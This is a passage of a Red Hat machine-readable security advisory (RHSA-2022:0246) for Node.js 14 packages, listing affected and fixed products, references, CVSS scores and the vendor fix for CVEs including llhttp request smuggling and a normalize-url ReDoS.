"AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-22960" }, { "category": "external", "summary": "RHBZ#2014059", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2014059" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-22960", "url": "https://www.cve.org/CVERecord?id=CVE-2021-22960" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-22960", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-22960" }, { "category": "external", "summary": "https://nodejs.org/en/blog/vulnerability/oct-2021-security-releases/", "url": "https://nodejs.org/en/blog/vulnerability/oct-2021-security-releases/" } ], "release_date": "2021-10-12T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-01-25T09:28:51+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-docs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:0246" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "products": [ "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-docs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "llhttp: HTTP Request Smuggling when parsing the body of chunked requests" }, { "cve": "CVE-2021-33502", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2021-05-24T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1964461" } ], "notes": [ { "category": "description", "text": "A flaw was found in normalize-url. Node.js has a ReDoS (regular expression denial of service) issue because it has exponential performance for data.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-normalize-url: ReDoS for data URLs", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-docs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-33502" }, { "category": "external", "summary": "RHBZ#1964461", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1964461" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-33502", "url": "https://www.cve.org/CVERecord?id=CVE-2021-33502" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-33502", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-33502" }, { "category": "external", "summary": "https://snyk.io/vuln/SNYK-JS-NORMALIZEURL-1296539", "url": "https://snyk.io/vuln/SNYK-JS-NORMALIZEURL-1296539" } ], "release_date": "2021-05-21T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-01-25T09:28:51+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-docs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:0246" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debuginfo-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-debugsource-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-devel-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-docs-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-full-i18n-1:14.18.2-2.module+el8.4.0+13643+6c0ebf22.x86_64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-nodemon-0:2.0.15-1.module+el8.4.0+13503+fc29810b.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.aarch64", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.ppc64le", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.s390x", "AppStream-8.4.0.Z.EUS:nodejs:14:8040020211213111158:522a0ee4:npm-1:6.14.15-1.14.18.2.2.module+el8.4.0+13643+6c0ebf22.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "nodejs-normalize-url: ReDoS for data URLs" }, { "cve": "CVE-2021-37701", "cwe": { "id": "CWE-22", "name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)" }, "discovery_date": "2021-08-31T00:00:00+00:00", "ids": [ { "system_name": "Red Hat 